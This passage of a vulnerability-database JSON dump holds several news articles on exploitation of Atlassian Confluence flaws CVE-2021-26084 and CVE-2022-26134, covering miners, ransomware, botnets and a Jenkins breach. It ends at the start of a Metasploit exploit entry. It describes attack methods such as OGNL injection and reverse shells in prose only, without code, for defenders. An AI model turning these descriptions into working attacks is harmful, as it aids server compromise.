THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[![Atlassian Confluence](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[![Ransomware and Crypto Miners](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e1000/code.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[![atlassian confluence](https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s728-e1000/Atlassian-Confluence.jpg)](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[![Atlassian Confluence](https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s728-e1000/jenkin.jpg)](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[![Cryptocurrency Miners](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e1000/malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[![Atlassian Confluence](https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. \"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[![Atlassian Confluence](https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[![Atlassian Confluence](https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. \"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-12-03T17:23:50", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 